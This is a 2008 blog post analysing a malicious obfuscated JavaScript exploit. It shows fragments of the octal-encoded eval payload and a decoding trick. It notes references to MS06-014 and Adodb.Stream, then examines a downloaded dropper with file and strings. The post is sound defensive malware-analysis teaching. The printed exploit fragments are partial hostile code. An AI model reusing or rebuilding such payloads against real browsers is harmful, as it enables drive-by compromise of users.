14 January, 2008

JavaScript decoding and more

JavaScript obfuscation is pretty common. There are plenty of places to find out about how to reverse it along with basic malware analysis tips. Here is an example of obfuscated JavaScript I've seen. I will be posting a few malicious code examples in this entry, so caution is advised with any of the code or URL. If you can avoid it, I also would suggest not downloading malicious content on your production network.

eval("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\56\151\156\144\145\1
70\117\146\50\47\117\113\47\51\75\75\55\61\51\173\15\12\164\162\171\173\166\141\162\40\145\73\15\
12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\10
5\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\122\151\

-- snipped --

\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\4
2\51\15\12\173\15\12\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142
\157\165\164\72\142\154\141\156\153\42\51\73\175\15\12\175\175\175")
How do I figure out what this exploit attempt is doing? As pointed out on ISC, there are a number of ways to decode JavaScript. Remember the following caveat from the first link above:
For the first two methods mentioned, be mindful that you are actually running hostile code inside a potentially vulnerable web browser. Make sure to apply the usual precautions (VMWare or the like, deployed far away from any production network you might have, and keeping a keen eye on the firewall log, etc).
I chose the lazy method in this case. First, I downloaded the JavaScript file using wget. Then I made a copy, changing the file extension from .js to .html, added the script tag, and changed "eval" to "alert".
<script language=JavaScript>
alert("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\56\151\156\144\145\1

-- snipped --

\157\165\164\72\142\154\141\156\153\42\51\73\175\15\12\175\175\175")
</script>
Now opening the file with a browser will show the decoded JavaScript. Please remember that the links and code in the below image are malicious and you visit them or run the code at your own risk.


There are a number of references to other scripts and files in the above code. There is also further obfuscation in the form of hexadecimal code. There are a number of quick ways to convert the hexadecimal to ASCII, either online or with your programming language of choice. As examples, the hexadecimal of the "Rising" variable above translates to "classid", the "Kaspersky" variable represents a specific CLSID, and the "KV2008" variable translates to "Adodb.Stream". We also see a reference to MS06-014, and more.

If you're using NSM with session data, you can see whether any systems that were subjected to the initial JavaScript exploit code then connected to any related sites after the exploit attempt, which could indicate the exploit succeeded. If you have full content packet captures, you can even see the data in the activity that followed.

I also decided to download some of the files to see what I was dealing with. The .cab file in particular looked interesting. I downloaded it using wget and then unpacked it using cabextract. This revealed an executable.
$ file cabfile.exe
cabfile.exe: MS-DOS executable, MZ for MS-DOS
I also took a quick look with the strings command, which had a few interesting lines.
$ strings -n 3 -a cabfile.exe | less
MZKERNEL32.DLL
LoadLibraryA
j'Y
GetProcAddress

-- snipped --

D:\FastDown\MHDropper\Release\MHDropper.pdb
The executable definitely doesn't look like a friendly file. Finally, the results from VirusTotal show that only 18 of the 32 engines detect it as malicious. I would say that 18 out of 32 is ineffective at best, especially considering that one large vendor's product did not detect the file as malicious.

This all goes to show that you can get a lot of information with fairly basic procedures. If anyone has a critique or interesting information to add, please post a comment.

2 comments: